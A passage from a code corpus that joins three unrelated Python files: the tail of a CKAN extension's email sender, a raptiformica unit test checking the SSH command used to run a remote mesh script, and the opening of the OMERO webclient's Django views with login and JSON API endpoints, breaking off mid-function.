part = MIMEBase('application', 'octet-stream')
part.set_payload(file.file.read())
Encoders.encode_base64(part)
extension = file.filename.split('.')[-1]
header_value = 'attachment; filename=attachment.{0}'.format(extension)
part.add_header('Content-Disposition', header_value)
msg.attach(part)
try:
s = smtplib.SMTP(SMTP_SERVER)
if SMTP_USER:
s.login(SMTP_USER, SMTP_PASSWORD)
s.sendmail(from_, to, msg.as_string())
s.quit()
response_dict = {
'success': True,
'message': 'Email message was successfully sent.'
}
return response_dict
except SMTPRecipientsRefused:
error = {
'success': False,
'error': {
'fields': {
'recepient': 'Invalid email recepient, maintainer not '
'found'
}
}
}
return error
except socket_error:
log.critical('Could not connect to email server. Have you configured '
'the SMTP settings?')
error_dict = {
'success': False,
'message': 'An error occured while sending the email. Try again.'
}
return error_dict
| ViderumGlobal/ckanext-requestdata | ckanext/requestdata/emailer.py | Python | agpl-3.0 | 2,576 |
from raptiformica.shell.execute import COMMAND_TIMEOUT
from raptiformica.shell.raptiformica import run_raptiformica_command
from tests.testcase import TestCase
class TestRunRaptiformicaCommand(TestCase):
def setUp(self):
self.log = self.set_up_patch('raptiformica.shell.raptiformica.log')
self.execute_process = self.set_up_patch(
'raptiformica.shell.execute.execute_process'
)
self.process_output = (0, 'standard out output', '')
self.execute_process.return_value = self.process_output
def test_run_raptiformica_command_logs_running_raptiformica_command_message(self):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
self.assertTrue(self.log.info.called)
def test_run_raptiformica_command_runs_raptiformica_command_on_the_remote_host(self):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
expected_command = [
'/usr/bin/env', 'ssh', '-A',
'-o', 'ConnectTimeout=5',
'-o', 'StrictHostKeyChecking=no',
'-o', 'ServerAliveInterval=10',
'-o', 'ServerAliveCountMax=3',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'PasswordAuthentication=no',
'[email protected]', '-p', '2222',
'sh', '-c',
'"cd /usr/etc/raptiformica; '
'export PYTHONPATH=.; '
'./bin/raptiformica_mesh.py --verbose"'
]
self.execute_process.assert_called_once_with(
expected_command,
buffered=False,
shell=False,
timeout=COMMAND_TIMEOUT
)
def test_run_raptiformica_command_raises_error_if_remote_raptiformica_command_fails(self):
process_output = (1, 'standard out output', 'standard error output')
self.execute_process.return_value = process_output
with self.assertRaises(RuntimeError):
run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
def test_run_raptiformica_command_returns_remote_command_exit_code(self):
ret = run_raptiformica_command(
"export PYTHONPATH=.; ./bin/raptiformica_mesh.py --verbose",
'1.2.3.4', port=2222
)
self.assertEqual(ret, 0)
| vdloo/raptiformica | tests/unit/raptiformica/shell/raptiformica/test_run_raptiformica_command.py | Python | mit | 2,513 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2016 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
''' A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything.'''
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
from time import time
from omero_version import build_year
from omero_version import omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import Http404, HttpResponse, HttpResponseRedirect, \
JsonResponse
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.template import RequestContext as Context
from django.utils.http import urlencode
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_str
from django.core.servers.basehttp import FileWrapper
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from webclient_utils import _formatReport, _purgeCallback
from forms import GlobalSearchForm, ContainerForm
from forms import ShareForm, BasketShareForm
from forms import ContainerNameForm, ContainerDescriptionForm
from forms import CommentAnnotationForm, TagsAnnotationForm
from forms import MetadataFilterForm, MetadataDetectorForm
from forms import MetadataChannelForm, MetadataEnvironmentForm
from forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from forms import MetadataStageLabelForm, MetadataLightSourceForm
from forms import MetadataDichroicForm, MetadataMicroscopeForm
from forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from controller.container import BaseContainer
from controller.history import BaseCalendar
from controller.search import BaseSearch
from controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import chgrpMarshal
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import Show, IncorrectMenuError, \
paths_to_object, paths_to_tag
from omeroweb.decorators import ConnCleaningHttpResponse, parse_url
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import ProjectI, DatasetI, ImageI, \
ScreenI, PlateI, \
ProjectDatasetLinkI, DatasetImageLinkI, \
ScreenPlateLinkI, AnnotationAnnotationLinkI, TagAnnotationI
from omero import ApiUsageException, ServerError, CmdError
from omero.rtypes import rlong, rlist
from omeroweb.webgateway.views import LoginView
import tree
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_longs(request, name):
"""
Retrieves parameters from the request. If the parameters are not present
an empty list is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
vals = []
vals_raw = request.GET.getlist(name)
for val_raw in vals_raw:
vals.append(long(val_raw))
return vals
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, 'build_year': build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context['template'] = settings.INDEX_TEMPLATE
except Exception:
context['template'] = 'webclient/index.html'
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context['template'] = 'webclient/index.html'
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = 'OMERO.web'
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
if request.session.get('active_group'):
if (request.session.get('active_group') not in
conn.getEventContext().memberOfGroups):
del request.session['active_group']
if request.session.get('user_id'):
# always want to revert to logged-in user
del request.session['user_id']
if request.session.get('server_settings'):
# always clean when logging in
del request.session['server_settings']
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get('noredirect'):
return HttpResponse('OK')
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except:
url = reverse("webindex")
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get('server', request.POST.get('server'))
if server_id is not None:
initial = {'server': unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
'version': omero_version,
'build_year': build_year,
'error': error,
'form': form}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context['url'] = urlencode({'url': url})
if hasattr(settings, 'LOGIN_LOGO'):
context['LOGIN_LOGO'] = settings.LOGIN_LOGO
t = template_loader.get_template(self.template)
c = Context(request, context)
rsp = t.render(c)
return HttpResponse(rsp)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
""" Keeps the OMERO session alive by pinging the server """
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
url = url or reverse("webindex")
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = request.GET.get('active_group')
active_group = int(active_group)
if ('active_group' not in request.session or
active_group != request.session['active_group']):
request.session.modified = True
request.session['active_group'] = active_group
def fake_experimenter(request, default_name='All members'):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = request.session.get('server_settings').get('ui', {}) \
.get('menu', {}).get('dropdown', {}).get('everyone', {}) \
.get('label', default_name)
return {
'id': -1,
'omeName': label,
'firstName': label,
'lastName': '',
}
@login_required(login_redirect='webindex')
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except:
logger.error('Exception during logout.', exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse("webindex"))
else:
context = {
'url': reverse('weblogout'),
'submit': "Do you want to log out?"}
t = template_loader.get_template(
'webgateway/base/includes/post_form.html')
c = Context(request, context)
return HttpResponse(t.render(c))
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get('template', None)
if template is None:
if menu == 'userdata':
template = "webclient/data/containers.html"
elif menu == 'usertags':
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get('show', Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError, e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# need to be sure that tree will be correct omero.group
if first_sel is not None:
switch_active_group(request, first_sel.details.group.id.val)
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.POST.copy())
if menu == "search":
if global_search_form.is_valid():
init['query'] = global_search_form.cleaned_data['search_query']
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get('load_template_url', None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = (request.session.get('active_group') or
conn.getEventContext().groupId)
# prepare members of group...
leaders, members = conn.getObject(
"ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get('experimenter')
if initially_open_owner is not None:
if (request.session.get('user_id', None) != -1):
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (user_id not in
(set(map(lambda x: x.id, leaders))
| set(map(lambda x: x.id, members))) and user_id != -1):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get('user_id', None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session['user_id'] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = myColleagues.values()
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
'menu': menu,
'init': init,
'myGroups': myGroups,
'new_container_form': new_container_form,
'global_search_form': global_search_form}
context['groups'] = groups
context['myColleagues'] = myColleagues
context['active_group'] = conn.getObject(
"ExperimenterGroup", long(active_group))
context['active_user'] = conn.getObject("Experimenter", long(user_id))
context['initially_select'] = show.initially_select
context['isLeader'] = conn.isLeader()
context['current_url'] = url
context['page_size'] = settings.PAGE
context['template'] = template
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn,
url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId]
groups = [g for g in conn.getObjects("ExperimenterGroup")
if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
'template': 'webclient/base/includes/group_user_content.html',
'current_url': url,
'groups': groups,
'myGroups': myGroups}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
member_id = get_long_or_default(request, 'member', -1)
except ValueError as e:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the groups
groups = tree.marshal_groups(conn=conn,
member_id=member_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'groups': groups})
@login_required()
def api_experimenter_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the experimenters
experimenters = tree.marshal_experimenters(conn=conn,
group_id=group_id,
page=page,
limit=limit)
return JsonResponse({'experimenters': experimenters})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest('Invalid experimenter id')
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id)
return JsonResponse({'experimenter': experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
experimenter_id = get_long_or_default(request, 'id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
r = dict()
try:
# Get the projects
r['projects'] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned datasets (without project parents)
r['datasets'] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the screens for the current user
r['screens'] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned plates (without project parents)
r['plates'] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
# Get the orphaned images container
try:
orph_t = request \
.session['server_settings']['ui']['tree']['orphans']
except:
orph_t = {'enabled': True}
if (conn.isAdmin() or
conn.isLeader(gid=request.session.get('active_group')) or
experimenter_id == conn.getUserId() or
orph_t.get('enabled', True)):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit)
orphaned['name'] = orph_t.get('name', "Orphaned Images")
r['orphaned'] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
project_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the datasets
datasets = tree.marshal_datasets(conn=conn,
project_id=project_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'datasets': datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
''' Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
'''
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
dataset_id = get_long_or_default(request, 'id', None)
orphaned = get_bool_or_default(request, 'orphaned', False)
load_pixels = get_bool_or_default(request, 'sizeXYZ', False)
thumb_version = get_bool_or_default(request, 'thumbVersion', False)
date = get_bool_or_default(request, 'date', False)
experimenter_id = get_long_or_default(request,
'experimenter_id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = 'share_id' in kwargs and long(kwargs['share_id']) or None
try:
# Get the images
images = tree.marshal_images(conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'images': images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
screen_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get the plates
plates = tree.marshal_plates(conn=conn,
screen_id=screen_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'plates': plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
plate_id = get_long_or_default(request, 'id', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest('id (plate) must be specified')
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'acquisitions': plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
""" This is just used internally by api_link DELETE below """
if parent_type == 'orphaned':
return None
link_type = None
if parent_type == 'experimenter':
if child_type in ['dataset', 'plate', 'tag']:
# This will be a requested link if a dataset or plate is
# moved from the de facto orphaned datasets/plates, it isn't
# an error, but no link actually needs removing
return None
elif parent_type == 'project':
if child_type == 'dataset':
link_type = 'ProjectDatasetLink'
elif parent_type == 'dataset':
if child_type == 'image':
link_type = 'DatasetImageLink'
elif parent_type == 'screen':
if child_type == 'plate':
link_type = 'ScreenPlateLink'
elif parent_type == 'tagset':
if child_type == 'tag':
link_type = 'AnnotationAnnotationLink'
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = """
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
""" % link_type
if parent_id:
params.add('pid', rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404("No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids))
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
""" This is just used internally by api_link DELETE below """
if parent_type == 'experimenter':
if child_type == 'dataset' or child_type == 'plate':
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return 'orphan'
if parent_type == 'project':
project = ProjectI(long(parent_id), False)
if child_type == 'dataset':
dataset = DatasetI(long(child_id), False)
l = ProjectDatasetLinkI()
l.setParent(project)
l.setChild(dataset)
return l
elif parent_type == 'dataset':
dataset = DatasetI(long(parent_id), False)
if child_type == 'image':
image = ImageI(long(child_id), False)
l = DatasetImageLinkI()
l.setParent(dataset)
l.setChild(image)
return l
elif parent_type == 'screen':
screen = ScreenI(long(parent_id), False)
if child_type == 'plate':
plate = PlateI(long(child_id), False)
l = ScreenPlateLinkI()
l.setParent(screen)
l.setChild(plate)
return l
elif parent_type == 'tagset':
if child_type == 'tag':
l = AnnotationAnnotationLinkI()
l.setParent(TagAnnotationI(long(parent_id), False))
l.setChild(TagAnnotationI(long(child_id), False))
return l
return None
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
# Handle link creation/deletion
json_data = json.loads(request.body)
if request.method == 'POST':
return _api_links_POST(conn, json_data)
elif request.method == 'DELETE':
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
""" Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
When creating a link, fails silently if ValidationException
(E.g. adding an image to a Dataset that already has that image).
"""
response = {'success': False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id,
child_type, child_id)
if link and link != 'orphan':
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
p = conn.getQueryService().get(ptype, parent_id,
conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response['success'] = True
except:
logger.info("api_link: Exception on saveArray with %s links"
% len(linksToSave))
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for l in linksToSave:
try:
conn.saveObject(l)
except:
pass
response['success'] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
""" Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {'success': False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(conn, parent_type,
parent_id,
child_type,
child_ids)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(conn,
parent_type,
None,
child_type,
child_ids)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response['success'] = True
return JsonResponse(response)
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, 'experimenter', None)
project_id = get_long_or_default(request, 'project', None)
dataset_id = get_long_or_default(request, 'dataset', None)
image_id = get_long_or_default(request, 'image', None)
screen_id = get_long_or_default(request, 'screen', None)
plate_id = get_long_or_default(request, 'plate', None)
acquisition_id = get_long_or_default(request, 'run', None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, 'acquisition',
acquisition_id)
well_id = request.GET.get('well', None)
tag_id = get_long_or_default(request, 'tag', None)
tagset_id = get_long_or_default(request, 'tagset', None)
group_id = get_long_or_default(request, 'group', None)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(conn, experimenter_id, project_id,
dataset_id, image_id, screen_id, plate_id,
acquisition_id, well_id, group_id)
return JsonResponse({'paths': paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
if request.method == 'GET':
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == 'DELETE':
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
''' Get a list of tags
Specifiying tag_id will return any sub-tags, sub-tagsets and
objects tagged with that id
If no tagset_id is specifed it will return tags which have no
parent
'''
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
group_id = get_long_or_default(request, 'group', -1)
tag_id = get_long_or_default(request, 'id', None)
experimenter_id = get_long_or_default(request, 'experimenter_id', -1)
orphaned = get_bool_or_default(request, 'orphaned', False)
load_pixels = get_bool_or_default(request, 'sizeXYZ', False)
date = get_bool_or_default(request, 'date', False)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit)
else:
tagged = {}
# Get 'tags' under tag_id
tagged['tags'] = tree.marshal_tags(conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
''' Delete the listed tags by ids
'''
# Get parameters
try:
tag_ids = get_longs(request, 'id')
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
